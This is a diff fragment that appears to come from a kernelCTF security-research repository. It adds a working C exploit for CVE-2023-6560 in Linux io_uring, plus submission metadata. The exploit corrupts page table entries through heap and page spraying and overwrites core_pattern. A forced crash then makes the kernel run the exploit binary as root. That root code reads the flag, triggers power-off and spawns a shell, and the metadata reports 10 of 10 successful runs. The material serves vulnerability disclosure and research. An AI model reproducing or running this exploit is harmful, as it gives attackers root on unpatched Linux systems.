+static void setCpuAffinity(int cpu_n, pid_t pid) { + cpu_set_t set; + + CPU_ZERO(&set); + CPU_SET(cpu_n, &set); + + if (sched_setaffinity(pid, sizeof(set), &set) < 0) { + die("sched_setaffinity: %m"); + } +} + +void packet_socket_rx_ring_init(int s, unsigned int block_size, + unsigned int frame_size, unsigned int block_nr, + unsigned int sizeof_priv, + unsigned int timeout) { + int v = TPACKET_V3; + int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v)); + if (rv < 0) { + die("setsockopt(PACKET_VERSION): %m"); + } + + struct tpacket_req3 req; + memset(&req, 0, sizeof(req)); + req.tp_block_size = block_size; + req.tp_frame_size = frame_size; + req.tp_block_nr = block_nr; + req.tp_frame_nr = (block_size * block_nr) / frame_size; + req.tp_retire_blk_tov = timeout; + req.tp_sizeof_priv = sizeof_priv; + req.tp_feature_req_word = 0; + + rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req)); + if (rv < 0) { + die("setsockopt(PACKET_RX_RING): %m"); + } +} + +int packet_socket_setup(unsigned int block_size, unsigned int frame_size, + unsigned int block_nr, unsigned int sizeof_priv, + int timeout) { + int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); + if (s < 0) { + die("socket(AF_PACKET): %m"); + } + + packet_socket_rx_ring_init(s, block_size, frame_size, block_nr, sizeof_priv, + timeout); + + struct sockaddr_ll sa; + memset(&sa, 0, sizeof(sa)); + sa.sll_family = PF_PACKET; + sa.sll_protocol = htons(ETH_P_ALL); + sa.sll_ifindex = if_nametoindex("lo"); + sa.sll_hatype = 0; + sa.sll_pkttype = 0; + sa.sll_halen = 0; + + int rv = bind(s, (struct sockaddr *)&sa, sizeof(sa)); + if (rv < 0) { + die("bind(AF_PACKET): %m"); + } + + return s; +} + +int pagealloc_pad(int count, int size) { + return packet_socket_setup(size, 2048, count, 0, 10000); +} + +// core_pattern exploit taken from +// https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-52447_cos/exploit/cos-105-17412.294.10/exploit.c#L444 +int check_core() { + // Check if /proc/sys/kernel/core_pattern has been overwritten + char buf[0x100] = {}; + int core = open("/proc/sys/kernel/core_pattern", O_RDONLY); + SYSCHK(read(core, buf, sizeof(buf))); + close(core); + return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0; +} +void crash(char *cmd) { + int memfd = memfd_create("", 0); + SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff)); + dup2(memfd, 666); + close(memfd); + while (check_core() == 0) + usleep(100); + /* Trigger program crash and cause kernel to executes program from + * core_pattern which is our "root" binary */ + *(size_t *)0 = 0; +} + +void pwn() { + int pipe_fds[SPRAY_PIPE_NUM][2] = {}; + void *page_spray[SPRAY_PMD_NUM] = {}; + char buf[BUF_SZ] = {}; + void *sqes, *rings; + + // We need a looser limit on files to increase stability & CAP_NET_RAW to spray pg_vec. + sandboxCommon(); + + // Reduce noise when performing page fengshui. + setCpuAffinity(0, getpid()); + + // Prepare pages for spraying ptes. + for (int i = 0; i < SPRAY_PMD_NUM; i++) { + page_spray[i] = + SYSCHK(mmap((void *)(SPRAY_PAGES_MMAP_START + i * PMD_SZ), SPRAY_PAGE_SZ, + PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0)); + } + + // We choose pipe pages to help us do page fengsui because it is easy to spray. + for (int i = 0; i < SPRAY_PIPE_NUM; i++) { + SYSCHK(pipe(pipe_fds[i])); + SYSCHK(write(pipe_fds[i][1], buf, 1)); + } + + // We keep the first half of the pipe pages; hopefully, they can keep the discontinuous order-0 pages. Free those whose indices satisfy `indices % 4 == 0`. + for (int i = SPRAY_PIPE_NUM / 2; i < SPRAY_PIPE_NUM; i += 4) { + SYSCHK(close(pipe_fds[i][0])); + SYSCHK(close(pipe_fds[i][1])); + pipe_fds[i][0] = 0; + pipe_fds[i][1] = 0; + } + + // Spray pg_vec to hopefully reuse one of the freed slots for a `pg_vec` array.(We only care about the first `pg_vec` buffer, which later will serve as CQ’s Page A.) + int cq_page_a_fd = pagealloc_pad(NUM_CQ_PAGES, PAGE_SIZE); + + // Free the pages whose indices satisfy `indices % 4 != 0`, and spray page table entries in their place. + for (int i = SPRAY_PIPE_NUM / 2; i < SPRAY_PIPE_NUM; i++) { + if (!pipe_fds[i][0]) + continue; + SYSCHK(close(pipe_fds[i][0])); + SYSCHK(close(pipe_fds[i][1])); + pipe_fds[i][0] = 0; + pipe_fds[i][1] = 0; + } + + // Spray pmd page + for (int i = 0; i < SPRAY_PMD_NUM; i++) + *(char *)((size_t)page_spray[i]) = 'A'; + + // Preserving SQ Functionality + int sqes_fd = pagealloc_pad(1, SQ_SZ); + sqes = + SYSCHK(mmap((void *)0x1234000000, SQ_SZ, PROT_READ | PROT_WRITE, + MAP_SHARED | MAP_POPULATE, sqes_fd, 0)); + SYSCHK(mmap((void *)(0x1234000000 + SQ_SZ - PAGE_SIZE), SQ_SZ, + PROT_READ | PROT_WRITE, MAP_FIXED | MAP_SHARED | MAP_POPULATE, + sqes_fd, 0)); + + // Likely CQ’s Page A ends up adjacent to the page table entries we intend to corrupt + rings = SYSCHK(mmap((void *)0xdead0000, CQ_SZ, + PROT_READ | PROT_WRITE, MAP_SHARED, cq_page_a_fd, 0)); + SYSCHK(mmap((void *)0xdead0000 + CQ_SZ - PAGE_SIZE, CQ_SZ, + PROT_READ | PROT_WRITE, MAP_SHARED | MAP_FIXED, cq_page_a_fd, 0)); + + // *&rings->sq.tail = ctx->sq_entries + *(volatile unsigned int *)(rings + 4) = SQ_ENTRIES; + + // Trigger the vulnerability + struct io_uring_params params = { + .flags = IORING_SETUP_NO_MMAP | IORING_SETUP_NO_SQARRAY, + .sq_off = {.user_addr = (unsigned long)sqes}, + .cq_off = {.user_addr = (unsigned long)rings}}; + int uring_fd = SYSCHK( + syscall(__NR_io_uring_setup, /*entries=*/ SQ_ENTRIES, ¶ms)); + logi("uring_fd @ %d", uring_fd); + + // Fill the CQ's Page A + int sqes_offset = 0; + struct io_uring_sqe *sqe = NULL; + for (; sqes_offset < (PAGE_SIZE - /* offsetof(struct io_rings, cqes) */0x40) * (sizeof(struct io_uring_sqe) / sizeof(struct io_uring_cqe)); sqes_offset += sizeof(struct io_uring_sqe)) { + sqe = (struct io_uring_sqe *)(sqes + sqes_offset); + memset(sqe, 0, sizeof(*sqe)); // NOP + } + + // Set up the sqe to overwrite the first page table entry + sqe = (struct io_uring_sqe *)(sqes + sqes_offset); + memset(sqe, 0, sizeof(*sqe)); + sqe->opcode = IORING_OP_NOP; + // 0x9c000: fixed address, please refer to https://github.com/google/security-research/blob/ca13fc6d5e7184b13bb82a91dd3a6fa2430fdbd7/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/exploit.md#leak-through-write + // 0x8000000000000067: page table entry flags (_PAGE_BIT_PRESENT | _PAGE_BIT_RW | _PAGE_BIT_USER | _PAGE_BIT_ACCESSED | _PAGE_BIT_DIRTY | _PAGE_BIT_NX) + sqe->user_data = 0x9c000 | 0x8000000000000067; + sqe++; + + int enter_res; + for (int i = 0; i < (PAGE_SIZE - /* offsetof(struct io_rings, cqes) */0x40) / sizeof(struct io_uring_cqe); i++) { + enter_res = SYSCHK(syscall(__NR_io_uring_enter, uring_fd, 1, 0, 0, 0)); + } + + // Overwrite the first page table entry to leak + enter_res = SYSCHK(syscall(__NR_io_uring_enter, uring_fd, 1, 0, 0, 0)); + + // Find corrupted page table entry + size_t victim_addr = -1, leaked_brk = -1; + for (int i = 0; i < SPRAY_PMD_NUM; i++) { + if (*(size_t *)(page_spray[i]) != 'A') { + victim_addr = (size_t)page_spray[i]; + leaked_brk = *(size_t *)page_spray[i]; + leaked_brk &= PAGE_MASK; +#define KASLR_ON +#ifdef KASLR_ON + leaked_brk -= 0x4000; +#else + leaked_brk -= 0x1000; +#endif + logi("fake_page @ %lx phys_leak @ %lx", victim_addr, leaked_brk); + break; + } + } + + // Not found, just exit and pray the kernel won't crash :) + if (victim_addr == -1) { + loge("Bad luck, but may try again..."); + exit(EXIT_FAILURE); + } + + // Found, locate the core_pattern + size_t core_pattern_pa = leaked_brk + (CORE_PATTERN - _BRK); // core_pattern + size_t core_pattern_pte = (core_pattern_pa & PAGE_MASK) | 0x8000000000000067; + logi("core_pattern_pte @ %lx", core_pattern_pte); + + // Set up the sqe to overwrite the second page table entry + sqe->opcode = IORING_OP_NOP; + sqe->user_data = core_pattern_pte; + sqe++; + + // Overwrite the second page table entry to gain the ability to modify core_pattern + enter_res = SYSCHK(syscall(__NR_io_uring_enter, uring_fd, 1, 0, 0, 0)); + + char *fake = "|/proc/%P/fd/666 %P"; + strcpy((void *)(victim_addr + (sizeof(struct io_uring_cqe) / 8) * PAGE_SIZE + (core_pattern_pa & 0xfff)), fake); + if (fork()) { + sleep(100); + } + crash(""); +} +int main(int argc, char **argv) { + if (argc > 1) { + // This section of code will be execute by root! + int pid = strtoull(argv[1], 0, 10); + int pfd = syscall(SYS_pidfd_open, pid, 0); + int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); + int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); + int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); + dup2(stdinfd, 0); + dup2(stdoutfd, 1); + dup2(stderrfd, 2); + /* Get flag and poweroff immediately to boost next round try in PR + * verification workflow*/ + SYSCHK(system("cat /flag;echo o>/proc/sysrq-trigger;")); + execlp("bash", "bash", NULL); + exit(0); + } + // ? As the instance will poweroff after we get the flag + while (1) { + pid_t pid = fork(); + if (pid < 0) { + perror("fork"); + exit(EXIT_FAILURE); + } + + if (pid == 0) { + pwn(); + } + + int status; + waitpid(pid, &status, 0); + } +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-6560_mitigation/metadata.json b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/metadata.json new file mode 100644 index 00000000..7808951a --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/metadata.json @@ -0,0 +1,33 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": [ + "exp212" + ], + "vulnerability": { + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=820d070feb668aab5bc9413c285a1dda2a70e076", + "cve": "CVE-2023-6560", + "affected_versions": [ + "6.6 - 6.6.5" + ], + "requirements": { + "attack_surface": [ + "io_uring" + ], + "capabilities": [ + ], + "kernel_config": [ + "CONFIG_IO_URING" + ] + } + }, + "exploits": { + "mitigation-v4-6.6": { + "uses": [ + "io_uring", + "userns" + ], + "requires_separate_kaslr_leak": false, + "stability_notes": "10 times success per 10 times run" + } + } +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-6560_mitigation/original.tar.gz b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/original.tar.gz new file mode 100644 index 00000000..d22afe51 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/original.tar.gz differ